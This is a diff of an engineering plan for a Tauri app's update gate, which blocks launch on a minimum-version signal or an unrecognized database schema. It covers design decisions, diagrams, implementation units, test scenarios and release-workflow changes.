+- KTD3. **Answer refinery's question read-only, before refinery asks it.** The probe opens `vector.db` on a read-only connection and compares the whole `refinery_schema_history` table against the build's embedded migration set, reproducing all three conditions `verify_migrations` aborts on: an applied row with no embedded counterpart, an applied row whose embedded counterpart differs, and an embedded versioned migration at or below the database's current version that was never applied. Checking only the highest row would have closed the above-ceiling case and left the other two producing exactly the opaque unlock failure this plan exists to eliminate — `verify_migrations` loops over every applied row, so the probe must too. Reading roughly thirty rows per profile is cheap; the aggregate scan's cost bound in System-Wide Impact is what keeps that honest. The probe must not go through `get_db_connection`, which runs migrations. The highest recognized version stays derived from the embedded set rather than hard-coded, because it means "the highest schema this binary understands", which changes with the binary; that is the opposite of `PRE_REFINERY_CEILING`, whose purpose is to stay pinned to a historical commit, and the two must never be unified. Governs R5, R6.
+  - **Binding constraint this decision depends on:** no future migration may drop or rename `refinery_schema_history`. `baseline_existing_account` stamps a forged history onto any database that has `settings` but no history table, without validating structure, so a build that removed the history table would be classified pre-refinery, stamped, and then migrated blind — worse than the abort the gate exists to prevent. U2 records this constraint beside the classifier in the same style `PRE_REFINERY_CEILING` records its own. It is documentation, not enforcement; whether to add a static CI guard is an open decision recorded in Risks.
+- KTD4. **Run the storage probe before any account enumeration, and make the orphan-cleanup verdict format-aware.** `list_accounts` deletes directories as a side effect of the same scan that answers `check_any_account_exists`, so a probe that runs after it runs after the damage. `classify_account_scan` takes the format verdict as a third input and never returns `Delete` for an unrecognized profile, which keeps the fix in the already-extracted pure function rather than in the scan loop. This backend verdict is the durable half of the protection: it holds regardless of frontend mount order, which is why R12 survives a UI regression that R6 would not. Governs R12, R5.
+- KTD5. **Scope the local check to `vector.db` and exclude the MLS store.** Current MLS stores are SQLCipher-encrypted and `classify_store` needs the Argon2id-derived key to read them, which does not exist before the PIN is entered — so a pre-unlock MLS classification is not possible, not merely undesirable. The MLS store already fails closed on an unrecognized schema at engine init and has its own in-channel explanation surface. Governs R5.
+- KTD6. **The local check gates routing; the remote check runs concurrently and never delays it.** This is the brainstorm's deferred ordering question. Fail-open (R4) means a network round trip must never sit between launch and the unlock screen, while R5 means the local probe must precede routing by construction. Running them concurrently satisfies both: the local verdict releases the launch, and the remote verdict lands into the same gate state whenever it resolves. Governs R1, R4, R5, R6.
+  - **Invariant this decision depends on:** onboarding and unlock must only ever render inside the gate's clear state. The ordering is enforced by mount structure — `Login.svelte` fires the account enumeration from its own `onMount`, so keeping it unmounted is what keeps the probe first — not by an await inside `checkAuthStatus`. Any future entry point that renders `Login` or re-runs `checkAuthStatus` outside the gate wrapper regresses R6 silently, while R12 stays protected by KTD4.
+- KTD7. **Freeze the gate verdict on every path that authenticates, and take the bounded await before any side effect on those paths — not merely before the session flag.** Without the await, a verdict that resolves a second after authentication has nowhere to land and the launch that could have blocked does not; without the freeze, a late verdict would interrupt a live session and violate R9. Placement is the load-bearing detail: `unlockWithPin` and `createAccount` already call `runPostLoginNetworkSync` — which connects to relays and syncs MLS groups — *before* they set `isAuthenticated`, so an await sitting just ahead of the flag would let a blocked client reach the network anyway, which is precisely what the objective forbids. The await therefore goes at the top of each of the three functions, ahead of every backend call, and the freeze goes on each success path. The timeout is what keeps the await honest — it expires into fail-open, so a slow network delays authentication briefly and never denies it. Governs R2, R9.
+- KTD8. **Compare versions with an app-local semver comparator instead of adding a dependency.** The repo has no `semver` package and the comparison is a few dozen lines, but it is the single point where a mistake locks a user out of a working install, so it lands as a pure function with its own tests rather than inline in the gate. It must tolerate a leading `v`: `resolveInstalledVersion` falls back to `buildVersion`, which is the git tag (`v0.2.0`), while `getVersion()` returns the bare bundle version. Governs R1, R2.
+- KTD9. **Render the block as a gate wrapper above both auth branches, not through the existing `UpdateAvailableModal`.** The modal is dismissible by design and mounts inside `+page.svelte`, which never renders while blocked; reusing it would mean defeating its dismissal path and moving it. A wrapper component around the layout body owns the three states the gate has — resolving, blocked, clear — and renders `UpdateAvailablePanel` inside the blocked state so the install mechanics are reused without the dismissible chrome. The rejected alternative was a block living only inside the `Login` shell: smaller, but it leaves a verdict arriving just after authentication with no surface to render on, trading a real hole for a slightly smaller diff. This is the brainstorm's deferred treatment question. Governs R7, R8, R14.
+- KTD10. **Stamp the manifest from a tracked value in a job that runs after the whole release matrix, and correct it through a dispatchable workflow.** `tauri-action` runs once per platform and each run rewrites `latest.json`, so any injection inside the matrix loses a race with the next platform; a `needs: publish-tauri` job is the same shape `update-homebrew-tap` already uses. Keeping the value in a tracked file rather than a workflow input means the next release cannot silently regress it, and the dispatchable workflow reuses the same script so a correction and a release produce identical manifests. Both entry points run the same validator, and the documented manual fallback runs it too — the least-protected path is the one used under the most time pressure, so it does not get to skip the check. Governs R3, R11.
+
+### High-Level Technical Design
+
+Gate resolution at cold launch. The local branch is on the critical path; the remote branch is not.
+
+```mermaid
+flowchart TB
+  L["App launch"] --> P["Probe vector.db per profile<br/>read-only, no migrations"]
+  L -.->|concurrent, never awaited| C["Memoized check() against latest.json"]
+  P --> PD{"Any history row fails<br/>parity with the embedded set?"}
+  PD -->|yes| B["Gate: blocked"]
+  PD -->|no| R["Render auth branch<br/>onboarding or unlock"]
+  C --> CN{"Update offered?"}
+  CN -->|"null"| OK["Compatible by R13 cap"]
+  CN -->|"error"| OK2["Fail open"]
+  CN -->|"Update"| CV{"min parseable, ≤ offered,<br/>and installed &lt; min?"}
+  CV -->|yes| B
+  CV -->|no| OK
+  B --> S["Block screen replaces both branches"]
+```
+
+Component placement. The wrapper sits above the auth branch, which is what makes "no auth surface renders behind the block" checkable by reading the tree.
+
+```mermaid
+flowchart TB
+  LR["+layout.svelte"] --> UG["UpdateGate"]
+  UG -->|resolving| SP["Spinner, matching Login's checking state"]
+  UG -->|blocked| BS["Block screen<br/>embeds UpdateAvailablePanel"]
+  UG -->|clear| CH["children snippet"]
+  CH --> AB{"isAuthenticated?"}
+  AB -->|yes| PG["+page.svelte app shell"]
+  AB -->|no| LG["Login.svelte<br/>fires account enumeration on mount"]
+```
+
+Gate verdict lifecycle. The freeze is what reconciles R2 with R9.
+
+```mermaid
+stateDiagram-v2
+  [*] --> Resolving: launch
+  Resolving --> Clear: local recognized, no remote verdict yet
+  Resolving --> Blocked: local unrecognized
+  Clear --> Blocked: remote verdict arrives pre-authentication
+  Clear --> Frozen: unlock, create, or import completes
+  Frozen --> [*]: session ends
+  Blocked --> [*]: user updates and relaunches
+  note right of Frozen
+    Late verdicts are recorded
+    but never applied. The store
+    itself rejects post-freeze
+    transitions. They take effect
+    at the next launch.
+  end note
+```
+
+Publish and correction. All three paths run the same validator against the same tracked value.
+
+```mermaid
+flowchart TB
+  V["scripts/release-compatibility.json<br/>minimumCompatibleVersion"] --> RJ["release.yaml: stamp job<br/>needs publish-tauri"]
+  V --> WD["release-compatibility.yaml<br/>workflow_dispatch"]
+  V --> MF["Operator fallback<br/>when Actions is down"]
+  RJ --> S["stamp-updater-compatibility.mjs<br/>validate, then inject"]
+  WD --> S
+  MF --> S
+  S --> G["gh release upload latest.json --clobber"]
+  G --> E["releases/latest/download/latest.json"]
+  E --> CL["Client check()"]
+```
+
+### Assumptions
+
+- Stamping runs after the release is already published, so there is a window of a few minutes where `latest.json` carries no minimum. Clients checking inside that window fail open, which is the same outcome as an unreachable endpoint and is acceptable.
+- A ten-second cap on the authentication-time await is long enough for a check started at launch to have resolved and short enough not to read as a hang. No baseline latency measurement backs the figure; it is a constant to tune against the fail-open smoke, not a product rule.
+- Blocking whenever the on-disk history fails parity with the embedded set is not over-strict: `refinery` already refuses that database, so the alternative to a block is a broken unlock, not a working one.
+- A read-only open of a WAL-mode database can still recover the wal-index and write `-shm`. That is correct SQLite behavior and is benign here — the same process may legitimately write the file moments later — so the probe must not set `immutable=1`.
+
+### Sequencing
+
+U1 and U2 are independent and land first. U3 and U4 both require U2 and touch disjoint surfaces. U5 requires U1 and U4. **U6 and U7 land together**: U6 wires the gate into the authentication paths, but its launch-ordering guarantee is only real once U7's wrapper keeps `Login.svelte` unmounted, because `Login`'s own `onMount` is what triggers account enumeration. U7 is deliverable on its own; the dependency runs one way. U8 is independent of the app-side work and can land at any point; U9 documents what U8 builds and follows it.
+
+---
+
+## Implementation Units
+
+### U1. App-local semver comparison
+
+- **Goal:** Give the gate one tested function that answers whether the installed version is below a published minimum.
+- **Requirements:** R1, R2. Governed by KTD8.
+- **Dependencies:** None.
+- **Files:**
+  - `src/lib/updater/version-compare.ts` (new)
+  - `src/lib/updater/version-compare.test.ts` (new)
+- **Approach:**
+  1. Export a parser that accepts an optional leading `v`, requires `major.minor.patch`, and returns `null` for anything it cannot parse.
+  2. Export a comparator over parsed versions following SemVer 2.0.0 precedence, including pre-release ordering (`1.0.0-beta` precedes `1.0.0`) and build metadata being ignored.
+  3. Export the gate's question directly — given an installed version and a candidate minimum, return whether the installed build is below it — so callers never re-derive the comparison. An unparseable input on either side answers "not below", matching R13's fail-open posture.
+- **Execution note:** Write this test-first. It is the one function whose defect is a lockout of a working install, and it has no dependencies to stand up.
+- **Patterns to follow:** `src/lib/updater/update-check.ts` for module shape and named exports; existing pure-function tests under `src/lib/`.
+- **Test scenarios:**
+  - Equal versions: installed `0.3.0` against minimum `0.3.0` is not below.
+  - Below across each component: `0.2.9` vs `0.3.0`, `0.3.0` vs `1.0.0`, `1.2.3` vs `1.2.4`.
+  - Above: `1.0.0` vs `0.9.9` is not below.
+  - Leading `v` tolerated on either side and on both: `v0.2.0` vs `0.3.0`, `0.2.0` vs `v0.3.0`.
+  - Numeric, not lexical, ordering: `0.10.0` is not below `0.9.0`.
+  - Pre-release precedence: `1.0.0-beta.1` is below `1.0.0`; `1.0.0` is not below `1.0.0-beta.1`; `1.0.0-alpha` is below `1.0.0-beta`.
+  - Build metadata ignored: `1.0.0+abc` and `1.0.0` compare equal.
+  - Unparseable minimum (`""`, `"latest"`, `"1.0"`, `null`) answers "not below".
+  - Unparseable installed version answers "not below".
+- **Verification:** `pnpm test` passes and no call site outside this module parses a version string.
+
+### U2. Storage-format classification for the app database
+
+- **Goal:** Let the backend answer whether this build recognizes the on-disk schema of every profile, without migrating anything.
+- **Requirements:** R5, R6. Governed by KTD3, KTD5.
+- **Dependencies:** None.
+- **Files:**
+  - `src-tauri/src/storage_format.rs` (new)
+  - `src-tauri/src/lib.rs` (declare the module — siblings are flat `mod X;` declarations, no module-list indirection)
+  - `src-tauri/src/migrations/mod.rs` (expose the highest embedded version and the embedded migration set for parity comparison)
+  - `src-tauri/src/mls_store_reset.rs` (adopt the extracted history-read helper)
+- **Approach:**
+  1. Extract the read-only history read — table-existence check plus the applied rows — into one helper parameterized by history-table name, and have both `mls_store_reset` and this module call it instead of each carrying the same queries. `mls_store_reset` reduces the rows to a max version as it does today; this module needs the whole set. `embedded::migrations::runner().get_migrations()` is already reachable from inside `migrations/mod.rs`; no visibility change is needed.
+  2. Add functions to `migrations` returning the highest embedded version and the embedded set, with a doc comment stating why the ceiling is derived while `PRE_REFINERY_CEILING` is pinned.
+  3. Classify one database from a read-only `Connection::open_with_flags` with a short busy timeout mirroring `account_has_valid_pkey`'s 2000 ms — never `get_db_connection`, which migrates.
+  4. Return a five-way classification. Absent file is `Fresh`. History table absent with a `settings` table present is `PreRefinery` (recognized — `run_migrations` baselines it). A history table present with no rows is `Recognized`, matching what `run_migrations` would do with it. Otherwise run parity against the embedded set and reproduce refinery's three abort conditions: an applied row with no embedded counterpart is `Unrecognized(version)`; an applied row whose embedded counterpart differs on name or checksum is `Divergent(version)`; an embedded versioned migration at or below the database's highest applied version that is absent from history is `Divergent(version)`. Everything else is `Recognized`. `Unrecognized` and `Divergent` both block — the remedy and the failure they prevent are identical — and both are distinguished in logs.
+  5. Any failure to read — the file exists but will not open, or a query errors after a successful open — classifies as `Recognized`. Corruption and transient locks are not version problems, and telling the user to update would not fix either; the existing error paths own those cases.
+  6. Record the KTD3 binding constraint as a doc comment beside the `PreRefinery` arm: no future migration may drop or rename `refinery_schema_history`, because `baseline_existing_account` would then forge history over a database it never validated.
+  7. Add a scan over the profile directories returning the aggregate verdict, the count of unrecognized profiles, and the highest offending version — enough for the block screen's copy and for support, and nothing more. No npub and no filesystem path appears in the report or in any error it returns. Bound the aggregate scan with an overall time cap; on expiry, report recognized rather than blocking, consistent with every other read failure.
+- **Patterns to follow:** `src-tauri/src/mls_store_reset.rs:51-100` for the read-only probe and the pure `classify_*` split that keeps the logic unit-testable without a filesystem; `src-tauri/src/account_manager.rs:171` for the busy-timeout precedent.
+- **Test scenarios:**
+  - Classification is a pure function over `(applied rows, history_table_exists, settings_table_exists, embedded set)`, exercised directly: a full matching history is recognized; a row above the highest embedded version is unrecognized; a row whose checksum differs from its embedded counterpart is divergent; a row whose name differs is divergent; an embedded migration missing from history below the applied maximum is divergent; no rows with history present is recognized; no history but `settings` present is pre-refinery; neither present is fresh.
+  - A checksum mismatch on a **middle** row, not the highest, is divergent — the case a top-row-only probe would wave through into a `DivergentVersion` abort at unlock.
+  - Against a real in-memory database migrated by `crate::migrations::run_migrations`: classifies as recognized, and the probe leaves `refinery_schema_history` byte-identical.
+  - A database with `settings` present, no history table, and a structure that is not pre-refinery-shaped still classifies as pre-refinery — asserting the documented constraint is the only thing protecting this arm, so the test pins the behavior the doc comment explains.
+  - Covers AE2. A profile directory whose `vector.db` fails parity makes the aggregate scan report unrecognized and surface that version.
+  - A profile directory with no `vector.db` does not make the scan report unrecognized.
+  - An unreadable or truncated database file classifies as recognized rather than blocking.
+  - A query returning `SQLITE_BUSY` after a successful open classifies as recognized rather than blocking.
+  - Covers AE8. The scan over several profiles reports unrecognized when any one of them is, and reports the count.
+  - The report and every error variant contain no npub and no filesystem path.
+  - The embedded set is complete: it is non-empty, its highest version is at least `PRE_REFINERY_CEILING`, and its version set matches the migration files committed under `src-tauri/src/migrations/`. A floor check alone would pass a build that silently lost its newest migrations in a bad merge and then false-blocked every user carrying them.
+- **Verification:** `cd src-tauri && cargo test` passes, and the probe path contains no call to `run_migrations` or `get_db_connection`.
+
+### U3. Exempt unrecognized profiles from orphan cleanup
+
+- **Goal:** Stop `list_accounts` from deleting a profile whose database a newer build wrote.
+- **Requirements:** R12. Governed by KTD4.
+- **Dependencies:** U2.
+- **Files:**
+  - `src-tauri/src/account_manager.rs`
+- **Approach:**
+  1. Give `classify_account_scan` the profile's format classification as a third input and return `Skip` instead of `Delete` whenever the profile is unrecognized or divergent, regardless of the `pkey` verdict.
+  2. Classify each directory in the `list_accounts` loop before probing `pkey`, so the exemption applies to the same iteration that would otherwise delete.
+  3. Extend the doc comment on `AccountScanVerdict` to record that an unrecognized profile is never deleted and why — the existing comment already explains the `Err`-means-`Skip` policy and this is the same reasoning applied to a different unknown.
+- **Execution note:** This is the data-loss fix, and it is the only protection for R12 that survives a frontend regression. Land it with U2 rather than behind the rest of the gate, so the destructive path closes even if the UI work slips.
+- **Patterns to follow:** The existing extracted-verdict style in the same file — `classify_pkey_query_result` and `classify_account_scan` are already pure and table-tested. For the integration scenario, `tauri::test::mock_app()` with `get_profile_directory`, as used in `src-tauri/src/crypto.rs:462-469`; the file's own `#[cfg(test)]` modules only cover the pure functions and give no harness for `list_accounts`, which needs an `AppHandle`.
+- **Test scenarios:**
+  - Covers AE7. Unrecognized profile with `Ok(false)` from the `pkey` probe yields `Skip`, not `Delete`.
+  - Divergent profile with `Ok(false)` yields `Skip`.
+  - Unrecognized profile with `Err` from the `pkey` probe yields `Skip`.
+  - Unrecognized profile with a valid `pkey` yields `Include`, so a future-format account still appears in the list.
+  - Recognized profile with `Ok(false)` and not in flight still yields `Delete` — the existing cleanup is not disabled.
+  - Recognized profile with `Ok(false)` while in flight still yields `Skip`.
+  - Integration over a `mock_app()` temp app-data directory: a profile with an above-ceiling history row and no readable `pkey` survives a `list_accounts` call.
+- **Verification:** `cd src-tauri && cargo test` passes, and the integration test asserts the directory still exists after the scan.
+
+### U4. Expose the storage verdict to the frontend
+
+- **Goal:** Give the launch path one command that reports whether this build recognizes local storage.
+- **Requirements:** R5, R6. Governed by KTD3, KTD4.
+- **Dependencies:** U2.
+- **Files:**
+  - `src-tauri/src/storage_format.rs` (add the command)
+  - `src-tauri/src/lib.rs` (register in `generate_handler!`)
+  - `src/lib/api/auth.ts` (typed wrapper)
+- **Approach:**
+  1. Add `#[tauri::command] get_storage_compatibility` returning a serializable report: whether every profile is recognized, the count of unrecognized profiles, the highest offending version found, and the version this build supports. The `get_*` prefix matches the repo's split — `check_*` commands return a bare bool, report-shaped commands use `get_*`, as `get_mls_store_reset_state` does. Serde renames to camelCase so the wrapper's type needs no mapping.
+  2. Register it in `generate_handler!` and add the typed wrapper beside `checkAnyAccountExists` in `src/lib/api/auth.ts`. Custom app commands need no `src-tauri/capabilities/` entry; the sibling account commands have none.
+  3. Neither the report nor any error variant may carry a filesystem path or an npub. The command answers before authentication, and `get_profile_directory`'s own error strings embed the npub — do not surface them.
+  4. The wrapper's caller is U5's gate module. Do not land this unit without that caller — a registered command with no `invoke` reads as used to `cargo build` and ships dead, which is exactly the failure `docs/solutions/logic-errors/orphaned-relay-health-monitor-command.md` documents.
+- **Patterns to follow:** `src/lib/api/auth.ts:47` (`checkAnyAccountExists`) for wrapper shape; `get_mls_store_reset_state` in `src-tauri/src/lib.rs:8460` for a report-shaped command backed by a sibling module.
+- **Test scenarios:**
+  - The report struct serializes to the camelCase keys the wrapper's type declares.
+  - The command returns compatible for a directory tree with no profiles.
+  - The command returns incompatible, the count, and the offending version for a tree with one failing profile.
+  - An error returned by the command contains no npub substring and no path separator.
+- **Verification:** `pnpm check:tauri-commands` passes without a new baseline entry, and `pnpm check` accepts the wrapper's return type.
+
+### U5. Gate state and verdict resolution
+
+- **Goal:** Own the gate's three states, both triggers, the R13 cap, and the freeze, in one testable module.
+- **Requirements:** R1, R2, R4, R6, R8, R9, R10, R13. Governed by KTD1, KTD2, KTD6, KTD7.
+- **Dependencies:** U1, U4.
+- **Files:**
+  - `src/lib/updater/update-gate.ts` (new)
+  - `src/lib/updater/update-gate.test.ts` (new)
+  - `src/lib/updater/update-check.ts` (export the memoized per-launch `check()` and reuse `resolveInstalledVersion`)
+- **Approach:**
+  1. Expose a store holding `resolving | clear | blocked`, the block reason (`minimum-version` or `storage-format`), the installed version, the required version when known, and the unrecognized-profile count. The store's setter rejects any transition after the freeze — the freeze is an invariant of the store, not caller discipline, because the cited `createUpdateStatusStore` factory merges patches unconditionally and copying it verbatim would reopen exactly the bug KTD7 exists to prevent.
+  2. Source the installed version from the existing `resolveInstalledVersion()`, which already handles `getVersion()` returning `0.0.0` and the `v`-prefixed git-tag fallback. The block screen needs it for both reasons, and the storage-format reason has no `Update` object to read it from.
+  3. `resolveGateAtLaunch()` awaits the storage verdict from U4 and settles the store to `blocked` or `clear` on that alone, then starts the remote check without awaiting it — this is KTD6's split, and the launch path must never sit on the network.
+  4. Add a memoized per-launch `check()` in `update-check.ts` that both the gate and `checkForUpdates` consult, so one launch makes one round trip and the courtesy startup check cannot overwrite the gate's `updateStatus` with a second, independent result. Memoizing the network primitive does not touch R10: the gate still decides unconditionally, and `startupCheckEnabled` still governs only whether the courtesy notification surfaces.
+  5. The remote path routes its result through `updateStatus` — a blocking `Update` leaves that store `available` with the target version, which is what makes `UpdateAvailablePanel` render a live install action on the block screen per R8. A `null` result is compatible. A throw is fail-open, distinguished from `null` by the try/catch boundary, matching how `checkForUpdates` at `src/lib/updater/update-check.ts:127-143` already separates them. An `Update` means reading `minimum_compatible_version` from `rawJson`, discarding it when it is unparseable or above `update.version` per R13, and otherwise comparing it against `update.currentVersion` with U1. The call passes no options — in particular never `allowDowngrades`, which would invalidate KTD1's null-implies-compatible inference.
+  6. Never consult `startupCheckEnabled` — R10 makes the gate independent of that preference — and never gate the storage half on `isDevBuild()`, which is testable in dev. The remote half inherits the dev short-circuit because `check()` has no manifest to read in dev.
+  7. `awaitGateBeforeAuth()` resolves immediately when the remote verdict has already settled, otherwise waits for it under a timeout and treats expiry as fail-open.
+  8. `freezeGate()` marks the verdict final; a remote verdict arriving after the freeze is recorded for diagnostics and never applied.
+- **Patterns to follow:** `src/lib/updater/update-check.ts:60-86` for the store factory and status transitions — with the post-freeze guard added, which that factory does not have. The per-group `Record` plus generation counter in `src/stores/mls-reset.ts` is deliberately not the model: the gate has one verdict and one command call, not N keyed entities reconciled against a competing event stream.
+- **Test scenarios:**
+  - Covers AE1. Mocked `check()` returns an update whose `rawJson.minimum_compatible_version` is above the installed version and at or below the offered version: state becomes blocked with reason `minimum-version` and the required version recorded.
+  - The same blocking case leaves `updateStatus` at `available` with the offered version, so the block screen's install action is live.
+  - Installed version equal to the minimum: state stays clear.
+  - Covers AE6. Minimum above the offered `version`: ignored, state stays clear.
+  - Minimum absent from `rawJson`, or present but unparseable: ignored, state stays clear.
+  - Covers AE3. `check()` throws: state stays clear, and the storage verdict alone decides.
+  - `check()` resolves `null`: state stays clear without reading any manifest.
+  - Covers AE2. Storage verdict is unrecognized while `check()` throws: state is blocked with reason `storage-format`, and the installed version is still populated.
+  - Storage verdict is unrecognized while the remote verdict is compatible: still blocked; the two triggers are independent.
+  - The launch resolution settles the store before the remote promise resolves — the local verdict does not wait on the network.
+  - Two callers in one launch — the gate and `checkForUpdates` — produce exactly one underlying `check()` call.
+  - The gate resolves regardless of `startupCheckEnabled`, and the module reads no value from it.
+  - Covers AE4. A remote verdict resolving after `freezeGate()` leaves the state clear, asserted against the store's setter rather than the caller.
+  - `awaitGateBeforeAuth()` returns blocked when the remote verdict already says blocked, and returns clear when the timeout expires with the verdict still pending.
+- **Verification:** `pnpm test` passes and the module exposes no way for a caller to clear a blocked verdict.
+
+### U6. Wire the gate into launch and every authentication path
+
+- **Goal:** Make the gate the first thing that runs at launch and the last thing consulted before any session starts.
+- **Requirements:** R1, R2, R5, R9. Governed by KTD4, KTD6, KTD7.
+- **Dependencies:** U5, and U7 for the launch-ordering property (see Sequencing).
+- **Files:**
+  - `src/routes/+layout.svelte`
+  - `src/stores/auth.ts`
+  - `src/stores/auth.test.ts` (existing suite to extend — it already mocks `invoke` and covers `checkAuthStatus`, `unlockWithPin`, and `checkSession`)
+- **Approach:**
+  1. Call `resolveGateAtLaunch()` from the layout's `onMount`, ahead of the existing `checkSession()` call, so the storage probe precedes any account enumeration. `checkAuthStatus()` — which invokes `check_any_account_exists` and therefore `list_accounts` — runs from `Login.svelte`'s own mount, and U7's wrapper is what keeps that component unmounted until the verdict settles. Statement order inside the layout is necessary but not sufficient; the mount structure is the actual guarantee.
+  2. In `unlockWithPin`, `createAccount`, and `importAccount`, await `awaitGateBeforeAuth()` as the **first statement inside each function's `try`, ahead of every backend call**; on a blocked verdict, return without authenticating. Placing it just before `isAuthenticated.set(true)` is wrong and is the trap this step exists to avoid: `unlockWithPin` and `createAccount` already call `runPostLoginNetworkSync` — relay connection and MLS group sync — *before* that flag, so an await sitting next to the flag would let a blocked client reach the network first. Call `freezeGate()` on each success path.
+  3. Leave `runPostLoginNetworkSync` and the courtesy startup check otherwise untouched, and do not reorder the existing calls — moving the await to the top of each function makes the three paths uniform without changing any existing sequence.
+- **Patterns to follow:** `src/stores/auth.ts:294-309` for the unlock sequence around `runPostLoginNetworkSync` and `isAuthenticated`; `src/routes/+layout.svelte:21-28` for the existing mount hook; `src/stores/auth.test.ts` for the `invoke` mocking shape.
+- **Test scenarios:**
+  - A blocked verdict leaves `isAuthenticated` false and `currentUser` null, asserted separately for `unlockWithPin`, `createAccount`, and `importAccount`.
+  - A blocked verdict on each of the three paths issues **no** backend `invoke` at all — in particular `runPostLoginNetworkSync`'s relay and MLS sync calls never fire. This is the assertion that catches a regression back to an await placed next to the session flag.
+  - A clear verdict authenticates as before on all three paths and freezes the gate exactly once per path.
+  - A verdict that flips to blocked after a create or import completes does not clear `isAuthenticated` — the freeze holds, satisfying R9 on the onboarding paths, not just on unlock.
+  - **Test expectation for the layout half:** none as a unit test — the repo has no component-rendering tests. The ordering property is covered by U7's e2e and MCP scenarios and by the Verification Contract's storage-probe row.
+- **Verification:** `pnpm test` and `pnpm check` pass; a sandbox launch with a forced unrecognized profile never reaches the welcome screen on any of the three paths.
+
+### U7. Block screen
+
+- **Goal:** Replace the whole app with a non-dismissible update screen while the gate is blocked, and show nothing misleading while it resolves.
+- **Requirements:** R7, R8, R14. Governed by KTD9.
+- **Dependencies:** U5.
+- **Files:**
+  - `src/components/updater/UpdateGate.svelte` (new)
+  - `src/routes/+layout.svelte` (wrap the body)
+  - `src/lib/i18n/locales/en/updater.json`
+  - `src/lib/i18n/locales/es/updater.json`
+- **Approach:**
+  1. Author `UpdateGate.svelte` in runes mode with a `children` snippet. It renders a spinner while resolving, the block screen while blocked, and `{@render children()}` otherwise. Wrap the entire body of `+layout.svelte` — both the authenticated branch and `<Login />` — so no auth branch can render behind the block. This wrapper is the only thing enforcing KTD6's invariant; a future entry point that renders `Login` outside it regresses R6.
+  2. The resolving spinner must match `Login.svelte`'s existing `checking-screen` treatment — same markup, colors, and copy. The gate resolves, then `Login` mounts and immediately shows its own checking state; two different spinners in sequence read as a reload rather than one continuous launch.
+  3. The blocked state renders a full-screen panel: what happened, the installed and required versions, and no close affordance, no escape key handler, no backdrop dismissal. Give it `role="alertdialog"` with an `aria-live` region and move focus to the panel's first focusable element on mount — `MlsResetNotice.svelte`, the component this unit follows, already carries `role`/`aria-live`, and a non-dismissible full-screen takeover needs at least as much. Reason-specific copy distinguishes "this release is required" from "your data was written by a newer version", and the storage-format copy names the count of unrecognized profiles and the schema version, which is what makes U9's manual recovery route usable.
+  4. Embed `UpdateAvailablePanel` for the install action when `updateStatus` is `available`, which satisfies R8 without the dismissible `Modal` chrome — U5 is what makes that store reflect the gate's own check. Embed it as a child only; it is written in legacy syntax and none of that may be copied into this runes-mode component.
+  5. Branch the no-install-action fallback by reason. For `minimum-version`, offer retry plus the release page — the failure is transient. For `storage-format` with no available update, say plainly that this is not a transient failure, that a newer build already wrote the data on this machine, and point at the recovery route rather than a retry the user could sit on forever.
+  6. The release-page URL is a compile-time application constant. Never derive it from `rawJson` or any other manifest field: the manifest is unsigned, and a non-dismissible screen with an urgent audience is the worst possible place to render an attacker-supplied link.
+  7. Add `updater.gate.*` keys to both locale catalogs. No raw user-facing English in the component.
+- **Patterns to follow:** `src/components/channel/MlsResetNotice.svelte` for a runes component that renders reason-branched explanatory copy and carries `role`/`aria-live`; `src/components/updater/UpdateAvailablePanel.svelte` for the install and progress surface it embeds — which subscribes to `updateStatus` directly and has no `Modal` dependency, so it is safely embeddable.
+- **Test scenarios (Playwright e2e and MCP walkthrough — the repo runs no component-rendering unit tests):**
+  - Renders the spinner and no auth content while the gate is resolving, and `Login`'s account-enumeration command has not fired.
+  - The resolving spinner and `Login`'s checking spinner are visually identical, so the handoff shows no flash.
+  - Renders the children snippet and no block content when the gate is clear.
+  - Renders the block screen and no children when blocked, for both reasons, over both the authenticated and unauthenticated branches.
+  - Covers AE8. With one recognized and one unrecognized profile on the machine, the block screen renders rather than the unlock screen.
+  - The `minimum-version` reason shows the required version and a retry; the `storage-format` reason with no available update shows the non-transient copy and the recovery pointer, not a retry.
+  - The block screen exposes no dismiss control and does not clear on Escape or on a backdrop click.
+  - Focus lands inside the panel on mount and the panel is announced to assistive technology.
+  - The release-page link resolves to the compile-time constant even when the served manifest carries a different URL.
+  - Every visible string resolves through `$t`, and both `en` and `es` carry the new keys.
+- **Verification:** `pnpm lint` reports no new raw-text warnings, `pnpm check` passes, and `pnpm test:e2e` passes with the wrapper in the tree.
+
+### U8. Publish and correct the compatibility signal
+
+- **Goal:** Put the minimum on the published manifest from a tracked value, and make a wrong value correctable without a signed release.
+- **Requirements:** R3, R11, R13. Governed by KTD2, KTD10.
+- **Dependencies:** None.
+- **Files:**
+  - `scripts/release-compatibility.json` (new — beside the script that reads it, matching where `generate-release-manifest.mjs` and `local-update-test.mjs` already live; the repo root holds only cross-cutting tool config)
+  - `scripts/stamp-updater-compatibility.mjs` (new)
+  - `scripts/stamp-updater-compatibility.test.mjs` (new)
+  - `scripts/local-update-test.mjs` (add a minimum-compatible-version option)
+  - `.github/workflows/release.yaml`
+  - `.github/workflows/release-compatibility.yaml` (new — named for the `release.yaml` / `tag-release.yaml` / `prepare-release.yaml` family it joins)
+  - `.github/workflows/ci.yaml`
+- **Approach:**
+  1. `release-compatibility.json` holds `minimumCompatibleVersion`, seeded at `0.0.0` — a floor no release is below, so the gate ships inert and only engages when an operator raises it.
+  2. The script downloads `latest.json` for a tag, injects `minimum_compatible_version` (snake_case, matching the manifest's own `pub_date`), and re-uploads with `--clobber`. It exports its pure parts — read the value, validate it, merge it into a manifest object — so they are testable without a network or a release, and so both the operator fallback in U9 and the local smoke harness can call them directly.
+  3. Validation refuses to proceed when the minimum is unparseable or greater than the manifest's `version`, which is KTD2's publish-time half. It runs against the dispatch override exactly as it runs against the tracked value. A refusal fails the job rather than stamping a value that would block every client.
+  4. Add a `stamp-updater-compatibility` job to `release.yaml` with `needs: publish-tauri`, mirroring `update-homebrew-tap`'s shape, running the script against the tag and the tracked value.
+  5. Add `release-compatibility.yaml` with a `workflow_dispatch` taking a tag and an optional override value. Declare `permissions: contents: write` and nothing broader, matching `release.yaml:8-9,61-62`. Pass every dispatch input through `env:` — never interpolate `${{ inputs.* }}` into a `run:` body — and validate the override before any shell or network call.
+  6. Extend `scripts/local-update-test.mjs` with a minimum-compatible-version option whose value is merged into the generated manifest through the same exported merge function, so the Verification Contract's two-version smoke is runnable as written. Today `generateManifest` emits only `version`, `notes`, `pub_date`, and `platforms`, and the smoke test cannot produce a manifest the gate can block on.
